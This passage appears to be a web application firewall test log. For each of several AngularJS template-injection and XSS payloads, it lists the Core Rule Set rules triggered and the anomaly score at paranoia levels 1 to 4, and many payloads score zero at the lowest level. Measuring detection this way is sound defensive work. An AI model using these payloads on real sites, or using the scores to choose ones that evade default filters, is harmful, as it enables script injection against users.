933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 38
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 59
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 72
****** payload-171 ********
Payload:
payload={{ c=''.sub.call;b=''.sub.bind;a=''.sub.apply; c.$apply=$apply;c.$eval=b;op=$root.$$phase; $root.$$phase=null;od=$root.$digest;$root.$digest=({}).toString; C=c.$apply(c);$root.$$phase=op;$root.$digest=od; B=C(b,c,b);$evalAsync(" astNode=pop();astNode.type='UnaryExpression'; astNode.operator='(window.X?void0:(window.X=true,alert(1)))+'; astNode.argument={type:'Identifier',name:'foo'}; "); m1=B($$asyncQueue.pop().expression,null,$root); m2=B(C,null,m1);[].push.apply=m2;a=''.sub; $eval('a(b.c)');[].push.apply=a; }}
--- Paranoia Level 1 ---
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
Total Incoming Score: 20
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 58
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 79
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
934100 Node.js Injection Attack
933160 PL1 PHP Injection Attack: High-Risk PHP Function Call Found
933180 PL1 PHP Injection Attack: Variable Function Call Found
932100 PL1 Remote Command Execution: Unix Command Injection
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941330 PL2 IE XSS Filters - Attack Detected.
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 92
****** payload-172 ********
Payload:
payload={{constructor.constructor('alert(1)')()}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 13
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 47
****** payload-173 ********
Payload:
payload={{$on.constructor('alert(1)')()}}</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 13
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 34
--- Paranoia Level 4 ---
941380 AngularJS client side template injection detected
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 47
****** payload-174 ********
Payload:
payload=constructor.constructor('alert(1)')()</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942370 PL2 Detects classic SQL injection probings 2/3
Total Incoming Score: 5
--- Paranoia Level 3 ---
942370 PL2 Detects classic SQL injection probings 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 26
--- Paranoia Level 4 ---
942370 PL2 Detects classic SQL injection probings 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 39
****** payload-175 ********
Payload:
payload=a='constructor';b={};a.sub.call.call(b[a].getOwnPropertyDescriptor(b[a].getPrototypeOf(a.sub),a).value,0,'alert(1)')()</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 13
--- Paranoia Level 3 ---
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 34
--- Paranoia Level 4 ---
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 47
****** payload-176 ********
Payload:
payload=toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 18
--- Paranoia Level 3 ---
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
933161 PL3 PHP Injection Attack: Low-Value PHP Function Call Found
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
****** payload-177 ********
Payload:
payload={}[['__proto__']]['x']=constructor.getOwnPropertyDescriptor;g={}[['__proto__']]['x'];{}[['__proto__']]['y']=g(''.sub[['__proto__']],'constructor');{}[['__proto__']]['z']=constructor.defineProperty;d={}[['__proto__']]['z'];d(''.sub[['__proto__']],'constructor',{value:false});{}[['__proto__']]['y'].value('alert(1)')()</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 28
--- Paranoia Level 3 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 49
--- Paranoia Level 4 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 62
****** payload-178 ********
Payload:
payload={}.")));alert(1)//";</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 13
--- Paranoia Level 3 ---
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 29
--- Paranoia Level 4 ---
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 42
****** payload-179 ********
Payload:
payload='a'.constructor.prototype.charAt=[].join;[1]|orderBy:'x=1} } };alert(1)//';</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
Total Incoming Score: 21
--- Paranoia Level 3 ---
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 37
--- Paranoia Level 4 ---
942330 PL2 Detects classic SQL injection probings 1/3
942370 PL2 Detects classic SQL injection probings 2/3
941340 PL2 IE XSS Filters - Attack Detected.
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942110 PL2 SQL Injection Attack: Common Injection Testing Detected
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 50
****** payload-180 ********
Payload:
payload=constructor.constructor('alert(1)')()</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942370 PL2 Detects classic SQL injection probings 2/3
Total Incoming Score: 5
--- Paranoia Level 3 ---
942370 PL2 Detects classic SQL injection probings 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 26
--- Paranoia Level 4 ---
942370 PL2 Detects classic SQL injection probings 2/3
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942511 SQLi bypass attempt by ticks detected.
Total Incoming Score: 39
****** payload-181 ********
Payload:
payload=toString().constructor.prototype.charAt=[].join; [1,2]|orderBy:toString().constructor.fromCharCode(120,61,97,108,101,114,116,40,49,41)</a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 3
--- Paranoia Level 3 ---
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 19
--- Paranoia Level 4 ---
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 32
****** payload-182 ********
Payload:
payload=<input autofocus ng-focus="$event.path|orderBy:'[].constructor.from([1],alert)'"></a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
****** payload-183 ********
Payload:
payload=<input id=x ng-focus=$event.path|orderBy:'CSS&amp;&amp;[1].map(alert)'></a>
--- Paranoia Level 1 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
Total Incoming Score: 5
--- Paranoia Level 2 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
Total Incoming Score: 15
--- Paranoia Level 3 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 31
--- Paranoia Level 4 ---
921150 PL1 HTTP Header Injection Attack via payload (CR/LF detected)
942370 PL2 Detects classic SQL injection probings 2/3
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 57
****** payload-184 ********
Payload:
payload=<input autofocus ng-focus="$event.composedPath()|orderBy:'[].constructor.from([1],alert)'"></a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
Total Incoming Score: 23
--- Paranoia Level 3 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
Total Incoming Score: 39
--- Paranoia Level 4 ---
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
920272 PL3 Invalid character in request (outside of printable chars below ascii 127)
942460 PL3 Meta-Character Anomaly Detection Alert - Repetitive Non-Word Characters
942431 PL3 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (6)
920273 PL4 Invalid character in request (outside of very strict set)
920273 PL4 Invalid character in request (outside of very strict set)
942432 PL4 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (2)
Total Incoming Score: 52
****** payload-185 ********
Payload:
payload=<div ng-app ng-csp><div ng-focus="x=$event;" id=f tabindex=0>foo</div><div ng-repeat="(key, value) in x.view"><div ng-if="key == 'window'">{{ [1].reduce(value.alert, 1); }}</div></div></div></a>
--- Paranoia Level 1 ---
Total Incoming Score: 0
--- Paranoia Level 2 ---
941380 AngularJS client side template injection detected
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
Total Incoming Score: 53
--- Paranoia Level 3 ---
941380 AngularJS client side template injection detected
942490 Detects classic SQL injection probings 3/3
942260 PL2 Detects basic SQL authentication bypass attempts 2/3
942340 PL2 Detects basic SQL authentication bypass attempts 3/3
942370 PL2 Detects classic SQL injection probings 2/3
942200 PL2 Detects MySQL comment-/space-obfuscated injections and backtick termination
941340 PL2 IE XSS Filters - Attack Detected.
941320 PL2 Possible XSS Attack Detected - HTML Tag Handler
942430 PL2 Restricted SQL Character Anomaly Detection (args): # of special characters exceeded (12)
942150 PL2 SQL Injection Attack
942410 PL2 SQL Injection Attack
942130 PL2 SQL Injection Attack: SQL Tautology Detected.
